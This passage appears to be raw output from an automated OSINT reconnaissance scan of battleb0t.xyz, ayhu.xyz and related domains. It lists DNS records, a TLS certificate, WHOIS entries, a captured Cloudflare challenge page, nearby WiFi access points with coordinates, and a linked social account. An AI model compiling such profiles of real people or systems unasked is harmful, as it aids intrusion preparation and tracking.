{"record_type": "CNAME", "resolved_at": "2022-12-01T13:53:19.785914421Z"}, "enchocompnicha.tk": {"record_type": "A", "resolved_at": "2023-01-16T17:49:49.026447391Z"}, "manlopanficlle.tk": {"record_type": "A", "resolved_at": "2022-12-27T16:42:16.700640379Z"}, "cdn-3.madeincanadadirectory.ca.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-01T00:33:24.889964115Z"}, "jagotekno.com": {"record_type": "A", "resolved_at": "2023-04-22T14:38:01.151568998Z"}, "ftp.jogjacontemporary.net": {"record_type": "A", "resolved_at": "2023-05-10T19:05:42.498201439Z"}, "cg.cncap.ca": {"record_type": "A", "resolved_at": "2023-04-29T12:44:12.255784234Z"}, "account.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-11-17T13:39:14.401013523Z"}, "hakertidircordbils.tk": {"record_type": "A", "resolved_at": "2023-04-24T22:20:31.002106199Z"}, "lupiguitars.altervista.org": {"record_type": "CNAME", "resolved_at": "2023-04-27T22:39:14.320632180Z"}, "esipdages.tk": {"record_type": "A", "resolved_at": "2022-12-24T16:43:56.993137478Z"}, "mardederlohafi.cf": {"record_type": "A", "resolved_at": "2023-05-04T13:01:48.592242511Z"}, "asitsigsa.ml": {"record_type": "A", "resolved_at": "2023-02-21T18:25:08.432169225Z"}, "onedollarglasses.org": {"record_type": "A", "resolved_at": "2023-05-09T01:43:37.823377424Z"}, "bertrambert14.xyz": {"record_type": "A", "resolved_at": "2022-12-22T16:54:35.233949627Z"}, "vpnexpert.nl": {"record_type": "A", "resolved_at": "2023-05-01T19:57:49.698948942Z"}, "ok-medicalbilling-ok.live": {"record_type": "A", "resolved_at": "2023-05-01T17:47:16.990114377Z"}, "buy100.shop": {"record_type": "A", "resolved_at": "2023-04-22T20:30:28.859900313Z"}, "video.prinsapps.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-05T18:22:43.709528638Z"}, "account-dev.prinsapps.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-01T18:30:39.855141477Z"}, "bbot.bt3.baroni.tech": {"record_type": "A", "resolved_at": "2023-04-26T22:30:56.657884912Z"}, "bouncefitness.precisiongroup.com.au": {"record_type": "A", "resolved_at": "2023-02-21T12:15:56.351172926Z"}, "ghappsherkverve.xyz": {"record_type": "A", "resolved_at": "2022-10-01T16:00:32.859129543Z"}, "cpanel.menuin.pe": {"record_type": "A", "resolved_at": "2023-03-22T20:32:11.345789341Z"}, "kendalresearchgroup.eu.org": {"record_type": "A", "resolved_at": "2023-05-09T20:45:29.883376868Z"}, "trinityartistseries.org": {"record_type": "A", "resolved_at": "2022-12-29T16:31:11.663002382Z"}, "fastago.prinsapps.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-04-26T19:56:32.748547371Z"}, "login.sanopoly.com": {"record_type": "A", "resolved_at": "2023-04-22T00:18:08.415048164Z"}, "typearound.com": {"record_type": "A", "resolved_at": "2023-04-24T16:14:46.070651001Z"}, "mail.hlb.co.za": {"record_type": "A", "resolved_at": "2023-04-28T23:19:06.736816476Z"}, "50gb138.xyz": {"record_type": "A", "resolved_at": "2023-01-14T17:27:43.018315606Z"}, "therpsequavillicomp.tk": {"record_type": "A", "resolved_at": "2023-05-03T21:57:55.402091890Z"}, "mycleanersrock.com": {"record_type": "A", "resolved_at": "2022-11-23T16:19:42.997763435Z"}, "www.hlb.co.za": {"record_type": "A", "resolved_at": "2023-04-20T00:02:14.977582110Z"}, "nextcloud.alexricher.com": {"record_type": "A", "resolved_at": "2023-05-10T13:11:53.876178346Z"}, "refahilze.click": {"record_type": "A", "resolved_at": "2023-04-29T12:54:23.414088969Z"}, "emnotantfitmanas.ml": {"record_type": "A", "resolved_at": "2023-04-30T23:59:01.980378964Z"}, "latabke.tk": {"record_type": "A", "resolved_at": "2023-05-07T21:55:59.693650651Z"}, "www.thedot.cn.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-05T18:22:25.417735752Z"}, "mail.asaletbaman.com": {"record_type": "A", "resolved_at": "2023-04-29T13:53:58.193607223Z"}, "efinonkoconsran.cf": {"record_type": "A", "resolved_at": "2023-04-07T12:55:16.859598877Z"}, "2019.surfstationsurfschool.com": {"record_type": "A", "resolved_at": "2023-04-19T18:16:36.309307681Z"}, "octagonplastering.prinsapps.com": {"record_type": "CNAME", "resolved_at": "2022-11-19T13:48:18.916628263Z"}, "account.prinsapps.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-01T00:33:40.329778906Z"}, "magnus.on-tech.tech": {"record_type": "A", "resolved_at": "2023-04-16T20:47:32.869615095Z"}, "edericgakos.ml": {"record_type": "A", "resolved_at": "2023-02-27T16:49:01.824929419Z"}, "kola-jen.com": {"record_type": "A", "resolved_at": "2022-12-01T13:36:32.553804192Z"}, "cocselasva.gq": {"record_type": "A", "resolved_at": "2023-03-24T17:20:10.646834545Z"}}, "names": ["mardederlohafi.cf", "cdn-3.madeincanadadirectory.ca.cdn.cloudflare.net", "ftp.jogjacontemporary.net", "apps.codiotic.com", | 104.21.6.166 |
| 2023-05-12 02:44:33 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:88:80:c3:9c:e1:f5:05:d4:ce:eb:a7:b8:8b:96:69:16:e7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 13:22:33 2023 GMT
Not After : Jun 25 13:22:32 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:d7:3e:a0:44:3f:74:66:1e:5f:b3:2a:36:ad:
5d:f6:03:6b:7c:a2:a0:47:3a:fb:01:98:b1:8f:cc:
c2:91:5e:2e:be:9e:37:09:fc:a3:ca:c0:ce:59:08:
31:20:c4:42:4f:e2:31:60:c4:be:0d:a3:d0:7e:5f:
84:84:43:02:3b:79:0a:56:99:86:35:5f:ee:ec:21:
8b:06:16:ef:3b:0d:ec:b0:a6:01:ca:7c:9f:ae:0e:
21:80:e7:f6:f2:e9:02:7d:5d:df:7d:70:dd:dd:93:
90:c2:a3:7e:80:f6:ad:ed:f9:15:f2:c4:37:d6:ad:
4b:89:76:da:d5:eb:7c:ff:f8:44:95:84:d6:c3:19:
7b:70:37:49:42:e5:fe:7d:2c:bd:de:bc:2b:99:c0:
a4:9b:15:4f:d7:2f:f2:c7:b5:99:6b:e4:41:8f:a5:
3f:0f:85:1f:6c:4e:91:90:da:48:18:85:c0:a8:f9:
5b:43:e7:ba:4b:5b:17:69:9f:6a:26:1d:48:87:97:
a5:b7:a2:63:4f:58:3b:87:61:7a:53:e1:17:71:98:
3f:e6:14:b4:56:34:1d:a0:89:72:33:eb:2c:c5:36:
a0:27:b1:d2:f8:c6:e3:8f:79:67:b5:d6:8a:ec:f1:
bd:9b:ad:69:c1:3b:50:1a:84:e7:cb:cf:d0:71:43:
d2:3b:49:a5:27:2e:d1:3d:b9:18:82:02:4d:8f:b0:
bb:df:42:cf:64:aa:67:dc:2f:01:5a:31:2e:da:fb:
b2:d7:58:03:8e:aa:3f:4c:ca:46:eb:1f:d0:ce:c6:
8c:fe:3d:b8:0f:99:bb:cf:51:78:2e:f4:7a:df:b5:
ee:fc:f9:a7:d1:b7:2b:1b:c6:17:72:43:c6:34:57:
a1:d1:1d:f1:0c:8c:8a:f9:1d:27:7f:56:dc:e1:0f:
9b:fe:d2:eb:01:b7:80:25:0c:68:e6:38:d2:70:20:
00:db:75:51:f4:50:11:95:65:85:63:dc:a6:18:f5:
d8:1d:55:65:7b:fd:4b:42:c9:e0:e0:5b:99:47:62:
96:1e:29:13:2d:13:79:08:f1:19:4e:83:44:d1:b3:
1e:52:55:c8:85:91:ec:6f:74:02:73:b9:35:b5:4d:
32:70:2b:a5:40:65:f3:30:c9:2a:75:4a:fc:26:5e:
25:6b:0f:f0:6e:21:a9:a3:b3:fc:a9:24:00:c1:d2:
4b:2c:3d:0a:55:12:77:ec:d9:f9:b2:f1:bc:2c:ec:
53:cb:52:84:47:80:24:42:33:90:05:e1:7c:3a:b2:
37:ee:d5:9d:71:10:25:16:47:45:30:42:37:7d:df:
2f:44:a5:75:17:fd:0c:59:0a:14:5f:4a:c6:9e:57:
1c:e4:cb
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
EE:9A:7C:45:9F:8D:28:F8:82:DE:AE:58:A9:48:6F:F4:DA:ED:01:D8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a3:1a:73:71:ae:ed:9f:b5:9b:61:66:0e:f9:3c:05:e5:98:b9:
71:fe:3a:01:23:3c:a5:ed:da:b4:47:c0:62:3d:82:74:46:2d:
f3:bc:7d:58:f7:9d:a3:63:b0:c8:15:ad:b0:58:bc:d6:75:4d:
8b:28:94:cb:bc:69:7c:80:f8:cd:78:76:8f:73:94:76:90:7d:
80:5c:21:83:4e:e4:26:a7:06:a5:e9:38:47:ff:a7:5f:42:bd:
c4:d9:74:6a:33:69:46:51:e5:bd:52:74:21:07:0b:2d:14:31:
45:31:91:5d:2e:25:25:a0:10:c9:3a:3e:d7:38:78:9b:b2:aa:
22:af:71:e4:8a:d0:ec:e4:7c:b6:88:11:5f:5d:42:ee:2b:78:
b2:c8:8f:62:9a:3e:c3:a6:06:7e:f7:0b:b9:99:fa:b8:e0:42:
79:cd:64:e7:19:13:71:ab:ad:f1:90:66:20:91:56:0f:0c:e3:
48:ed:63:55:89:67:59:f7:08:9e:72:d6:2b:54:e9:5e:60:6b:
af:15:40:e4:e3:93:64:05:b5:87:bf:b5:3b:e3:0a:3e:94:9e:
a2:8e:f7:62:b7:7a:47:d1:97:14:d5:e3:c4:7b:f6:89:76:12:
8c:29:e2:6a:8d:3f:22:f5:b7:f7:82:ac:c9:19:ac:5c:cb:6e:
d1:2d:07:ab
| battleb0t.xyz |
| 2023-05-12 03:03:24 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000.github.io |
| 2023-05-12 03:12:14 | Affiliate - Domain Whois | No | Whois | 3 | 0 | 5 | 0 | None | Domain Name: KEYUBU.COM
Registry Domain ID: 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registry Expiry Date: 2023-07-31T21:39:32Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.COM
Registry Domain ID : 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registrar Registration Expiration Date: 2023-07-31T21:39:32Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.COM
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:12:03Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
| keyubu.com |
| 2023-05-12 02:44:27 | IP Address | No | DNS Resolver | 42 | 0 | 2 | 0 | None | 64.226.81.43 | kekw.battleb0t.xyz |
| 2023-05-12 03:24:21 | Web Content | No | Web Spider | 2 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c594cb34339')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="fXRp0MT2Gq_7yIcIgnBHmz4mvl642t3xYxkCV5CopVU-1683861861-0-AevD5zHzR5Nylhg7VMHylWA-UGhfY5JI7t_DZKLajlY04sfvOKhEUvL9GVGicMZplZkcd7EKnpXCooBz_psnEdyw4NmTFN3sNXxO3b2NuDlfX3fgFqIYYwxN-_ZcrgInEcSdq4ze85lgbNjmAyI7cICej2859mTsNPJTSg3Eei4MCiIEepygARCAmXkyjazT_siRWXRbIF3Yq9cQrkKvTYHjy7kA4ARUBhj3gHLsfY6ByHmcA-4oH5F_BMaNFfn83ZbE-O4HF1luYDVMX4jN2SY5BFBmGirV5lQE7nc2ET_G_HywU7GlMXbT0JmkojLsvRDxpqP_ZBtz_vJHbi4FUOHHRaxbF6WI1ct7U2kIlltKjNHrBNnSQ1zRICZ4xPEiXCRFEqv1mvMk_vuWumbRs70YeoiNBWGJjw9SNPC0qRv0_rQzWEhzAZCr9GR45Pyn22x2UzlVIl478oJoBXIxbm7A_QBYYHzFjMNgE8pR4rE43z-LkzbfZp4Mrz4ipAVKmZJGkf2Y5B_9TlYOJXKMjDFy4LD0ELxkw1-R_QW_mLtVmznveG5c9m2IZ2zQV1cn4H8j5Bc1iY811MUNVsmFG0JD-DYsguU4LRfDkaOmbWCSaJ34wnyswYZY6vuAq7jQcIjqzclxyNRihA5I_cL6ueo4Ri5oVSncrTfIsWIYMESFPA-cZy_mtxt3SdM8IrciE1x1sYi06n9I6prGHl0s-4QNR7JVOnbdMoI28ES-j7HwNWZk4MsUxFuzUOsk5lSLsSRh-hQZxr19nktp-MvVpSzRUuSL26nuxNFkN8FTk5Ae96R-Z683yfnj1pOwmIp-ezEp2JWb8TkZZ0zoMJBnNWz-dER92U4KjRMwAWRs684SongNmPEIXYAgqclvfJ3msrReLNbVn2C0cz7wvPKboCqEwy5ipFMXgNiuhbJpqavDTbOw2pcmk4nLwQO7-0fq6lR-AioIh72_7f-dcCDyp3CvaV2lSxONdGbwSj69Uzxdx9pjqKiA7eKWgpDp1A1TT4OM1UPvdKoDNlfXS-kt53TGtcDj_tr5ZSCxVfBj5Eaq6vy-dzTe3un5fL0Jw93IdI7hmq3BtVNMvvG3ttwva1yDFbKbbzAoei-_xuiypX7ONnqllk5lT1u_-s9W-YqxnvXblOasj5xt36xai8HGELg30c69mi7dS6KFtoe8onnoqh_Jv5x6H6CEBPpBlJkQ-7Wml_gwi2q6d0tQ_ZdaaMoOXxHsxIyK5qGvyrxIKQoaob4JTcbfXfzc5V6fJoXtr9RSoGgPAroX9StxeMfnAcZJZ38lwB2R_OkZXBx7EFcRTvZsqwNSAcBE597i5gxzUV9OIg9fnTaoLIGC6pMfXSOrCdhVP4gGEX4Bccu5X10qZzo6Szn5JgpstSZeqAMVuU9TWGPYdK5uOwlHRiWmjX7UntfXmsGqJLQN_MyyArtIqHW_GuUvvub4g6fNvemcAOPIu9NS3HWmMTmUN4ACMa423i12vOJGRP7TcmceYbGSntTQh51WDUHuY7LdwoWtDpwMlk9-stOh87SR4LOrDyvW1iZRowgiTy2GmxHJlIHKCRhXnA5KaH4pnPJkKkhrPoRN6DTCQDr15qpBgZxUmF4wezI7yU8i7hxFvjA2vpTMuEjzuFK5Xab8ZS1nR5YLbQiKD3ROG0S6bl-4nxyf66OU-8Xv4FaugupxS3e-wlAwiX3hxmLNdGdmQn9eyC4_2RwUK2WWp5b7e4SAi9-pAVBzMefue3T2KHTLHF643icuFWjUauohcHM9aP5V8YQkXvauXJeiafKXSGCb142muLvzgJ9tWui0nHCx7aGYnZ5KCXJJAPsMf9OR8piOc-bOw90DQdaaAoQce9uq1wQGOtC7qhcYnC54DqDoEYzADwA9eHH9CWAG4K79Bs3Vtk5_YaWGKevDuxwe2PI4tgDIlPhm0aaMmefu_Aqbmk6Nh3efYd6tebEuF1GGAbp894vPoKIV_oMOG4605Orlbta-mL3BdBLdomEjXGBNzJc8zOt_diWLDMArzlhmqHj68HR17Jaa_r6ERT_jArQXozZtM_B3L5O8SpcafOJWm3x_EH-cSS-ttAlAlAFa0wgnswXzQF8jvtcMH7wOU4U6LjP8DMTOtT18J0nltl0j_q-DNG4lBHonjmIjyRSP8oBxk-3z89_7YNTov0awtqgzLFZw2_mSARwNl4_HaPezvCevT53qGnFReXcG3RzOMm4zSBZbENl_DwydIdBN0QqU0z3ekKIj0DHHzeDbwvLRQiV0Lv01I4DZBYzgAdCYmkN3aWrG0sAU92LemS02Ukd_enHt1XRhTQOnUlyr42CJb5OOWo8CjNFcGn16guPRfUma268s38K2-wnhjS9iCXiymmGF-AAdAizqUKdabbQOSsatJ602VLlNMiwTbinDbOME_fkBdTGzKnt5g_beyji9YWF9g5kjIdThtdFTLZ7VtxqQe64uUOYy3ZMXGyBjPj32wUf-c45ZB1IslXSI3TZ3dwmgQZ-iw9MFsb5EQblUq7mhT6th">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '13393',
cRay: '7c5f8c594cb34339',
cHash: '405751743fca02b',
cUPMDTk: "\/lol.html?__cf_chl_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'eSl90ERW3ieYQBiJ/CvInfpugLrCuGqtrxfN7Hff3XV1tnjtcokhOvtXLaw36vmuW/PZRZbPFRsBG1FZ2o1L9/qlyM29SttBrPr40sLGiM5zROAIfmkLKaU7gxLqLGeRmXOxLm0iruqXtWXcZfwzLJMR0QDa6PkszA2FQ43qwQdSl1Fas7lyf05ZYuhd21mKW7cO3qwZeh7EGOKQrSA2vqJVYFosW/VZvSBGX51hzStLgJo3UlZTpeKFoRGBNXR72ajQEJiUb1nCtKKxYTlVZS5ZMnpJ22NtZ33eAOm1lxwFp0ZWMwtEtyfr7+KjIQ7sSru0tnVtRMYbJHwTDL1YqCRM5I3BrwhMSJldfYZdxbXvKROe8SujCKguS6whGqpyPhrBZ0ynuTVosC8rK1X1RTGfwKn+lPWLzhRyW3E937dmzZ7Hr4MVk+jCtkCg7+HiFEo7Z5MPv1Dw/bUNeEjjhnMO6Bk/fpz1g8p9agnrrAYImdotjjffG+sx7LYboUY2eNvy7Cmsh5FjNxiOeltcpgD/DjxarQtoa+6blRoBMw8jV7vrsKw7K7t0fZ6oSnZa',
t: 'MTY4Mzg2MTg2MS4zMjkwMDA=',
m: 'wei6RtcHCTh5k6jXLRR9uxE1j0nSB1DRW6i/4ZVDPwA=',
i1: 'b4n+etCkfjlnsH7ziL0wjQ==',
i2: 'jFCNa6uhaxi0l2WjI6PNAA==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c594cb34339');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c594cb34339';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://ayhu.xyz/lol.html |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | BHS (Net ID: 00:02:A8:9A:AC:ED) | 50.1188, 8.6843 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom6C4B98 (Net ID: 00:0C:F6:6C:4B:98) | 50.8897, 6.0563 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | likeevideo (Category: social)
https://likee.video/@ayhu | ayhu |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CableWiFi (Net ID: 00:0D:67:2F:5E:C7) | 39.0469, -77.4903 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SurfandSip (Net ID: 00:02:2D:03:7C:7A) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | New Improved Mad Dogs Network (Net ID: 00:02:2D:02:1F:7E) | 37.7642, -122.3993 |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.131 | 34.148.97.127 |
| 2023-05-12 03:01:30 | Web Server | No | Tool - WhatWeb | 0 | 0 | 2 | 0 | None | cloudflare | nuke.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Sunshine (Net ID: 00:07:40:87:15:01) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:09:53 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.98 |
| 2023-05-12 02:44:28 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | battleb0t.github.io |
| 2023-05-12 02:45:45 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Chantilly', u'security': {u'is_vpn': False}, u'city_geoname_id': 4751935, u'region_geoname_id': 6254928, u'country': u'United States', u'region': u'Virginia', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'FASTLY', u'isp_name': u'American Registry Internet Numbers', u'organization_name': u'American Registry Internet Numbers', u'autonomous_system_number': 54113}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'20151', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:44'}, u'latitude': 